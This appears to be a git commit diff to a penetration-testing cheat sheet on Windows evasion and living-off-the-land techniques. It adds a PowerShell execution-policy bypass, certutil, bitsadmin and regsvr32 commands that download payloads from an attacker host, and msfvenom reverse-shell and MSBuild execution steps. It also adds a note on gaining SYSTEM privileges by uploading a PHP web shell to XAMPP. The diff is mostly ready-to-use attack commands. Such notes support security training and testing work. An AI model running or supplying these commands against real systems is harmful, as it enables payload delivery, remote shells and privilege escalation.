added xampp privilege escalation
This commit is contained in:
parent
8a12374c52
commit
90394c5989
|
@ -81,6 +81,18 @@ AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479
|
|||
AMSI_RESULT_DETECTED = 32768
|
||||
```
|
||||
|
||||
## PowerShell Policy Bypass
|
||||
|
||||
```sh
|
||||
powershell -ExecutionPolicy Bypass
|
||||
```
|
||||
|
||||
or just the following line
|
||||
|
||||
```sh
|
||||
powershell -ep bypass
|
||||
```
|
||||
|
||||
### PowerShell Downgrade Attack
|
||||
|
||||
* Downgrade Powershell version to 2.0, where no AMSI is implemented
|
||||
|
|
|
@ -6,28 +6,35 @@
|
|||
|
||||
## Ingress Tool Transfer
|
||||
|
||||
* [certutil.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil), may be used for payload encoding as well
|
||||
[certutil.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil), may be used for payload downloads and encoding
|
||||
|
||||
```sh
|
||||
certutil.exe -urlcache -split -f http://%ATTACKER_IP%/shell.exe C:\Windows\Temp\noshell.exe
|
||||
certutil.exe -encode shell.exe encoded-shell.txt
|
||||
```
|
||||
|
||||
* [bitsadmin](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin)
|
||||
|
||||
```sh
|
||||
bitsadmin.exe /transfer /download /priority foreground http://%ATTACKER_IP%/shell.exe C:\Windows\Temp\noshell.exe
|
||||
```
|
||||
|
||||
* findstr
|
||||
|
||||
```sh
|
||||
findstr /v dummystring \\Path\to\shell.exe > C:\Windows\Temp\noshell.exe
|
||||
```
|
||||
|
||||
## Indirect Command Execution
|
||||
|
||||
* Explorer as parent process to execute other PEs
|
||||
Explorer as parent process to execute other PEs
|
||||
|
||||
```sh
|
||||
explorer /root, "C:\Windows\System32\cmd.exe"
|
||||
```
|
||||
|
||||
* Windows management instrumentation
|
||||
Windows management instrumentation
|
||||
|
||||
```sh
|
||||
wmic.exe process call create calc
|
||||
```
|
||||
|
@ -38,10 +45,12 @@ wmic.exe process call create calc
|
|||
|
||||
* `regsvr32.exe` can execute PEs in memory, even remotely
|
||||
* DLL has to match architecture
|
||||
|
||||
```sh
|
||||
C:\Windows\System32\regsvr32.exe C:\Temp\shell.dll
|
||||
C:\Windows\System32\regsvr32.exe /s /n /u /i:http://%ATTACKER_IP%/shell.dll shell.dll
|
||||
```
|
||||
|
||||
* `bash.exe -c calc.exe`
|
||||
|
||||
## Shortcut Modification Technique
|
||||
|
@ -51,10 +60,13 @@ C:\Windows\System32\regsvr32.exe /s /n /u /i:http://%ATTACKER_IP%/shell.dll shel
|
|||
* `msfvenom` with `windows/meterpreter/reverse_winhttps`
|
||||
* Set `multi/handler` with `set payload windows/meterpreter/reverse_winhttps`
|
||||
* Transform to `*.csproj`
|
||||
|
||||
```sh
|
||||
python2 PowerLessShell.py -type powershell -source /tmp/shell.ps1 -output shell.csproj
|
||||
```
|
||||
|
||||
* Execute on target
|
||||
|
||||
```sh
|
||||
c:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\Users\thm\Desktop\shell.csproj
|
||||
```
|
||||
|
|
|
@ -0,0 +1,9 @@
|
|||
# XAMPP
|
||||
|
||||
## XAMPP on Windows
|
||||
|
||||
There is a way to upload a shell to escalate to `nt authority\system`
|
||||
privileges through xampp. I used this multiple times in the last few days.
|
||||
Upload a PHP shell like [FOZZ's
|
||||
p0wny-shell](https://github.com/flozz/p0wny-shell.git) to the `C:\xampp\htdocs`
|
||||
directory and visit the resource in the browser.
|
Loading…
Reference in New Issue